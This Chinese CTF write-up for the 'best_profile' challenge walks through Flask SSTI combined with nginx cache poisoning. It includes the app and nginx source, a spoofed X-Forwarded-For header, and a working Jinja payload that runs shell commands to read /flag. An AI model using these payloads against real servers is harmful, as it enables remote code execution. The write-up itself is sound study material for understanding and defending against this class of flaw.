wpwpbest_profile
达达best_profile
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167
| import os import re import random import string import requests from flask import ( Flask, render_template, request, redirect, url_for, render_template_string, ) from flask_sqlalchemy import SQLAlchemy from flask_login import ( LoginManager, UserMixin, login_user, login_required, logout_user, current_user, ) from sqlalchemy.orm import DeclarativeBase from sqlalchemy.orm import Mapped, mapped_column from werkzeug.security import generate_password_hash, check_password_hash from werkzeug.middleware.proxy_fix import ProxyFix import geoip2.database
class Base(DeclarativeBase): pass
db = SQLAlchemy(model_class=Base)
class User(db.Model, UserMixin): id: Mapped[int] = mapped_column(primary_key=True) username: Mapped[str] = mapped_column(unique=True) password: Mapped[str] = mapped_column() bio: Mapped[str] = mapped_column() last_ip: Mapped[str] = mapped_column(nullable=True)
def set_password(self, password): self.password = generate_password_hash(password)
def check_password(self, password): return check_password_hash(self.password, password)
def __repr__(self): return "<User %r>" % self.name
app = Flask(__name__) app.config["SQLALCHEMY_DATABASE_URI"] = "sqlite:///data.db" app.config["SECRET_KEY"] = os.urandom(24) app.wsgi_app = ProxyFix(app.wsgi_app)
db.init_app(app) with app.app_context(): db.create_all()
login_manager = LoginManager(app)
def gen_random_string(length=20): return "".join(random.choices(string.ascii_letters, k=length))
@login_manager.user_loader def load_user(user_id): user = User.query.get(int(user_id)) return user
@app.route("/login", methods=["GET", "POST"]) def route_login(): if request.method == "POST": username = request.form["username"] password = request.form["password"] if not username or not password: return "Invalid username or password." user = User.query.filter_by(username=username).first() if user and user.check_password(password): login_user(user) return redirect(url_for("route_profile", username=user.username)) else: return "Invalid username or password." return render_template("login.html")
@app.route("/logout") @login_required def route_logout(): logout_user() return redirect(url_for("index"))
@app.route("/register", methods=["GET", "POST"]) def route_register(): if request.method == "POST": username = request.form["username"] password = request.form["password"] bio = request.form["bio"] if not username or not password: return "Invalid username or password." user = User.query.filter_by(username=username).first() if user: return "Username already exists." user = User(username=username, bio=bio) user.set_password(password) db.session.add(user) db.session.commit() return redirect(url_for("route_login")) return render_template("register.html")
@app.route("/<string:username>") def route_profile(username): user = User.query.filter_by(username=username).first() return render_template("profile.html", user=user)
@app.route("/get_last_ip/<string:username>", methods=["GET", "POST"]) def route_check_ip(username): if not current_user.is_authenticated: return "You need to login first." user = User.query.filter_by(username=username).first() if not user: return "User not found." return render_template("last_ip.html", last_ip=user.last_ip)
geoip2_reader = geoip2.database.Reader("GeoLite2-Country.mmdb") @app.route("/ip_detail/<string:username>", methods=["GET"]) def route_ip_detail(username): res = requests.get(f"http://127.0.0.1/get_last_ip/{username}") if res.status_code != 200: return "Get last ip failed." last_ip = res.text try: ip = re.findall(r"\d+\.\d+\.\d+\.\d+", last_ip) country = geoip2_reader.country(ip) except (ValueError, TypeError): country = "Unknown" template = f""" <h1>IP Detail</h1> <div>{last_ip}</div> <p>Country:{country}</p> """ return render_template_string(template)
@app.route("/") def index(): return render_template("index.html")
@app.after_request def set_last_ip(response): if current_user.is_authenticated: current_user.last_ip = request.remote_addr db.session.commit() return response
if __name__ == "__main__": app.run()
|
这个app.py的源码倒不难
- SSTI漏洞位置:
/ip_detail/<username>
路由使用 render_template_string
渲染模板
- 模板内容直接拼接用户控制的
last_ip
值(来自数据库)
- 攻击者可通过伪造
X-Forwarded-For
头污染 last_ip
值
- 污染
last_ip
的路径:
@app.after_request
使用 request.remote_addr
设置用户IP
- 应用程序使用
ProxyFix
中间件
- 可通过
X-Forwarded-For
头任意设置IP值
问题就是那个Cookie的登录验证
直接注册普通用户绕过不了
要利用nginx.conf文件的信息 即结合缓存投毒技术
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38
| worker_processes 1;
events { use epoll; worker_connections 10240; }
http { include mime.types; default_type text/html; access_log off; error_log /dev/null; sendfile on; keepalive_timeout 65; proxy_cache_path /cache levels=1:2 keys_zone=static:20m inactive=24h max_size=100m;
server { listen 80 default_server;
location / { proxy_pass http://127.0.0.1:5000; }
location ~ .*\.(gif|jpg|jpeg|png|bmp|swf)$ { proxy_ignore_headers Cache-Control Expires Vary Set-Cookie; proxy_pass http://127.0.0.1:5000; proxy_cache static; proxy_cache_valid 200 302 30d; }
location ~ .*\.(js|css)?$ { proxy_ignore_headers Cache-Control Expires Vary Set-Cookie; proxy_pass http://127.0.0.1:5000; proxy_cache static; proxy_cache_valid 200 302 12h; } } }
|

注册一个 以 .css 结尾的特殊用户
登录
传X-Forwarded-For: 111 这个是为了污染 last_ip
值 设置IP值
然后再去访问 /get_last_ip/???.css 使Nginx缓存响应
然后 去访问/ip_detail/???.css的时候 他就会利用缓存 从缓存中获取污染响应
就会绕过那层Cookie的检测 使last_ip.html的信息 成功渲染到/ip/detail/???.css路由里
就可以进行模板注入执行命令了
这个缓存的内容 似乎是没办法进行二次覆盖的 即会一直显示第一次缓存的内容
所以就需要先写好要执行的命令 然后再访问/ip/get_last_ip进行缓存响应

注册一个ddd.css用户 登录获取Cookie
1
| session=.eJwlzjEOwzAIAMC_eO4A2GCcz0TGgNo1aaaqf2-krjfdp-x5xPks2_u44lH2l5etWG0x-hrTpfXahYJsmi23rLnmnNYthE3CuouCACLDAhzIaQjAqu7qIxQhExu2KU2wR4VmrB7ETgvMxPB21pakc5CQrexQ7sh1xvHfEJXvD0I8L7A.aHQDhQ.UP34XTmc_gtPvtr8Sr-H41Y0-TI
|

抓包一下登陆界面
带Cookie访问 加请求头
1
| X-Forwarded-For: {{7*7}}
|
发包

访问/get_last_ip/ddd.css路由进行缓存响应

可以看到这里IP已经变成 49了
然后访问/ip_detail/ddd.css看看是否可以成功执行模板注入

显示49 可以进行模板注入
因为二次不能覆盖 那就要再注册一个用户进行命令执行了
这里我改成发包 访问了 可以看到还是49

那就在注册一个.css用户就可以了
然后可能是因为一些模板渲染或者获取缓存响应时的格式要求吧
有一些符号是不能够使用的 会报500错误
传
1
| X-Forwarded-For: {{lipsum.__globals__.os.popen(request.args.a).read()}}
|

访问/get_last_ip/dddd.css 缓存响应

访问
1
| /ip_detail/dddd.css?a=cat /flag
|
执行模板注入
